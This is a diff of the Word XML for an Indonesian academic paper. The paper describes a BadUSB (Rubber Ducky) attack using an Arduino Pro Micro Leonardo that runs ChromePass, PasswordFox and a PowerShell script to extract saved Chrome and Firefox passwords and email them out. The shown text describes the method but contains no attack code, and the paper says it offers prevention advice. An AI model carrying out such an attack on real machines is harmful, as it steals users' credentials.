           <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>management</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1188,6 +1431,60 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+        <w:t xml:space="preserve"> feature that makes users log in to a website </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>easily</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, but in fact </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>saving</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usernames and passwords in the browser is quite dangerous because the stored data can be hacked using brute force attacks or read through a program. One way to get a username and password in the browser is to use a program that can read Google Chrome and Mozilla Firefox login data from the computer's internal storage and then </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>show</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -1197,7 +1494,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Arduino Leonardo</w:t>
+        <w:t>those data</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1206,7 +1503,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> device that is connected to a computer device. The results obtained from this study ar</w:t>
+        <w:t xml:space="preserve">. In this study an attack will be carried out by implementing Rubber Ducky using BadUSB to run the ChromePass and PasswordFox program and the Powershell script using the Arduino Pro Micro Leonardo device. The results obtained from this study are the username and password on Google Chrome and Mozilla Firefox successfully obtained when the USB is connected to the target device, the average time of the attack is 14 seconds </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1215,7 +1512,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>e usernames and</w:t>
+        <w:t>then</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1224,97 +1521,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> passwords in the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Google Chrome and Mozilla Firefox</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> obtained when the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>USB</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is connected and sent </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>hacker</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>s email.</w:t>
+        <w:t xml:space="preserve"> sending it to the author's email.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1353,6 +1560,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Keywords: </w:t>
       </w:r>
+      <w:bookmarkStart w:id="1" w:name="_Hlk43328755"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1360,8 +1568,9 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>USB Attack, Powershell, Arduino Leonardo, Rubber Ducky.</w:t>
-      </w:r>
+        <w:t>Rubber Ducky, Arduino Pro Micro Leonardo, Powershell, ChromePass, PasswordFox.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:pict w14:anchorId="361E94E3">
           <v:shape id="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:15.85pt;margin-top:28.35pt;width:450pt;height:.1pt;z-index:-15727616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text" coordorigin="1417,577" coordsize="9000,0" path="m1417,577r9000,e" filled="f">
@@ -1421,7 +1630,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>Pendahuluan [10 pts/Bold]</w:t>
+        <w:t xml:space="preserve">Pendahuluan </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1499,7 +1708,6 @@
           <w:id w:val="641777847"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1553,6 +1761,7 @@
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
+              <w:lang w:val="en-GB"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
@@ -1565,7 +1774,16 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1587,7 +1805,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Hlk32935731"/>
+      <w:bookmarkStart w:id="2" w:name="_Hlk32935731"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -1616,7 +1834,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> juga berkembang pesat.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -1643,9 +1861,19 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">bersaing untuk mendapatkan pengguna sebanyak-banyaknya melaui sistem-sistem operasi yang ada. </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_Hlk32935753"/>
+        <w:t xml:space="preserve">bersaing untuk mendapatkan pengguna sebanyak-banyaknya melaui sistem-sistem operasi yang </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">ada. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_Hlk32935753"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -1672,17 +1900,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang paling banyak digunakan di dunia saat ini adalah Google Chrome dengan pangsa pasar sebesar 59.2%. Posisi Google Chrome saat ini sangatlah kuat dan hampir tidak bisa disaingi karena posisi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">kedua yang diduduki oleh Safari memiliki pangsa pasar sebesar 14,6% </w:t>
+        <w:t xml:space="preserve"> yang paling banyak digunakan di dunia saat ini adalah Google Chrome dengan pangsa pasar sebesar 59.2%. Posisi Google Chrome saat ini sangatlah kuat dan hampir tidak bisa disaingi karena posisi kedua yang diduduki oleh Safari memiliki pangsa pasar sebesar 14,6% </w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -1695,7 +1913,6 @@
           <w:id w:val="-373309679"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1739,6 +1956,7 @@
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
+              <w:lang w:val="en-GB"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
@@ -1753,7 +1971,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -1858,7 +2076,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> yang membutuhkan akun pengguna untuk menjalankannya. </w:t>
       </w:r>
-      <w:bookmarkStart w:id="2" w:name="_Hlk32935850"/>
+      <w:bookmarkStart w:id="4" w:name="_Hlk32935850"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -1947,7 +2165,6 @@
           <w:id w:val="587281332"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -1993,6 +2210,7 @@
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
+              <w:lang w:val="en-GB"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
@@ -2007,7 +2225,16 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="4"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -2189,7 +2416,6 @@
           <w:id w:val="487986904"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2233,6 +2459,7 @@
               <w:color w:val="000000"/>
               <w:sz w:val="20"/>
               <w:szCs w:val="20"/>
+              <w:lang w:val="en-GB"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
@@ -2275,7 +2502,7 @@
         </w:rPr>
         <w:t xml:space="preserve">BadUSB merupakan perangkat USB yang dimanipulasi oleh penyerang, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="3" w:name="_Hlk32936326"/>
+      <w:bookmarkStart w:id="5" w:name="_Hlk32936326"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -2285,7 +2512,7 @@
         </w:rPr>
         <w:t>agar saat terdeteksi oleh komputer target perangkat ini akan dikenali sebagai perangkat antar muka USB biasa, seperti keyboard komputer.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="5"/>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
@@ -2311,16 +2538,91 @@
           <w:color w:val="000000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Penelitian ini menyajikan rincian pendekatan dengan menerapkan penetrasi ke </w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Penelitian ini menyajikan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>tentang bagaimana cara</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">serta dampak yang ditimbulkan dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>pengambilan data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome dan Mozilla Firefox dari</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2347,7 +2649,27 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Arduino Leonardo</w:t>
+        <w:t xml:space="preserve">Arduino </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pro Micro </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Leonardo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2365,25 +2687,16 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">terhubung dengan komputer target </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">yang dideteksi sebagai USB </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve">terhubung dengan komputer target menggunakan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">USB </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2403,7 +2716,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (HID)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2518,7 +2831,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> menggunakan aplikasi yang disediakan pihak ketiga untuk kepentingan edukasi serta dijalankan melalui </w:t>
+        <w:t xml:space="preserve"> menggunakan program ChromePass dan PasswordFox melalui </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2566,7 +2879,25 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> kemudian dikirimkan via </w:t>
+        <w:t xml:space="preserve"> kemudian dikirimkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>melalui</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2594,7 +2925,27 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Arduino Leonardo</w:t>
+        <w:t xml:space="preserve">Arduino </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pro Micro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Leonardo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2619,6 +2970,25 @@
           <w:color w:val="000000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pada akhir penelitian penulis juga memberikan rekomendasi pencegahan terkait penyerangan ini</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -2713,8 +3083,8 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc43264822"/>
-      <w:bookmarkStart w:id="5" w:name="_Hlk43330976"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc43264822"/>
+      <w:bookmarkStart w:id="7" w:name="_Hlk43330976"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2727,7 +3097,7 @@
         </w:rPr>
         <w:t>Microcontroller</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3198,7 +3568,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3268,7 +3638,7 @@
           <w:szCs w:val="19"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Hlk43330951"/>
+      <w:bookmarkStart w:id="8" w:name="_Hlk43330951"/>
       <w:r>
         <w:rPr>
           <w:bCs/>
@@ -3482,7 +3852,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3924,7 +4294,7 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc43264827"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc43264827"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3935,7 +4305,7 @@
         </w:rPr>
         <w:t>Microsoft Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3947,7 +4317,7 @@
           <w:color w:val="000000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4241,6 +4611,20 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="317" w:firstLine="361"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
@@ -4261,7 +4645,7 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc43264828"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc43264828"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4272,7 +4656,7 @@
         </w:rPr>
         <w:t>Sistem Operasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4384,19 +4768,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">.  Sistem operasi dapat mengatur waktu kerja, pengecekan kesalahan, mengelola input dan output, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:iCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">penyimpanan, komplikasi serta pengolahan data. Secara umum, dapat disimpulkan bahwa </w:t>
+        <w:t xml:space="preserve">.  Sistem operasi dapat mengatur waktu kerja, pengecekan kesalahan, mengelola input dan output, penyimpanan, komplikasi serta pengolahan data. Secara umum, dapat disimpulkan bahwa </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4628,7 +5000,7 @@
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc43264829"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc43264829"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4650,7 +5022,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (USB)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5113,10 +5485,10 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6F2F13" wp14:editId="706DA033">
-            <wp:extent cx="4681728" cy="1127815"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
-            <wp:docPr id="9" name="Picture 9"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792FEC82" wp14:editId="0BAEA93C">
+            <wp:extent cx="3820620" cy="2504661"/>
+            <wp:effectExtent l="19050" t="19050" r="27940" b="10160"/>
+            <wp:docPr id="6" name="Picture 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5124,7 +5496,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPr id="0" name="Picture 2"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -5145,14 +5517,16 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4701633" cy="1132610"/>
+                      <a:ext cx="3849022" cy="2523281"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
                     <a:noFill/>
                     <a:ln>
-                      <a:noFill/>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
                     </a:ln>
                   </pic:spPr>
                 </pic:pic>
@@ -5238,18 +5612,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="229" w:lineRule="auto"/>
-        <w:ind w:left="284"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="284"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -5274,7 +5636,16 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pada Gambar IV-1 ditampilkan ilustrasi penyerangan yang dilakukan untuk melakukan pengambilan data pada komputer target. Penyerangan diawali dengan menghubungkan perangkat Arduino </w:t>
+        <w:t xml:space="preserve">Pada Gambar 1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ditampilkan ilustrasi penyerangan yang dilakukan untuk melakukan pengambilan data pada komputer target. Penyerangan diawali dengan menghubungkan perangkat Arduino </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5294,45 +5665,87 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Leonardo ke komputer target melalui port USB. Setelah itu USB Rubber Ducky akan  menjalankan baris kode yang</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
